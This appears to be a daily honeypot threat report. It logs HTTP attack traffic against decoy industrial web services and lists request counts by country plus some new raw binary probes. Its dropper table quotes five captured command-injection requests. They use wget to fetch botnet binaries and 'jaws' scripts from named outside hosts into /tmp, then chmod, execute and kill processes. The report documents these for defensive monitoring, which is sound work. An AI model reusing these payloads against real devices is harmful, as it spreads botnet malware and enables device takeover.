Skip to main content
  1. Daily-Posts/

Report: 2025-07-29

·280 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-29
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 4 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1005 requests were recorded during the day, originating from 5 different countries, with a peak of 603 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country

botnet_dropper_behaviour
#

remote_addrrequest
8.222.206.187GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
123.194.54.147GET /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd+/tmp;wget+http://unjiproxy.p-e.kr:6969/selftbk.sh+-O-
114.35.126.195GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C/89.221.203.116:6969/bins/arm7;chmod+777+arm7;./arm7+selfrep.jaws;wget+http:/\x5C/89.221.203.116:6969/bins/arm;chmod+777+arm;./arm+selfrep.jaws; HTTP/1.1
141.98.10.150GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+arm4+arm7;wget+http:/\x5C/172.94.96.217/home;chmod+777+home;./home+x.arm7;wget+http:/\x5C/172.94.96.217/aboutus;chmod+777+aboutus;./aboutus+x.arm4 HTTP/1.1
8.219.58.39GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1201\x00\x0E8\xF9\xC0/\xF9cO\xDC\x95\x00\x00\x00\x00\x00
1231GET /Config.xml HTTP/1.1
1861\x00\x0E8\xC3\x07V\xA6W\xF5\x96\xE7\x00\x00\x00\x00\x00
1881\x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/X\xE2\xF6\x7F\x00\x00P\xF8\xADVv\x00\x00\x00\xE0\x81}\xE2\xF6\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01

country_iso_code
#

number_of_occurencecountry_iso_code
0603US
147IN
245PT
345AR
445VN
542GB
628CN
721BG
818JP
915PL
1014NL
1113DE
1212RU
1310SC
147ZA
156LT
165RO
174TR
184KR
193TW
203KZ
213SG
222BR
232BE
242AU
251MU
261MY
271AT
281VE
291RS
301IR

Related

Report: 2025-07-28
·338 words
Repport Daily
Report: 2025-07-27
·337 words
Repport Daily
Report: 2025-07-26
·272 words
Repport Daily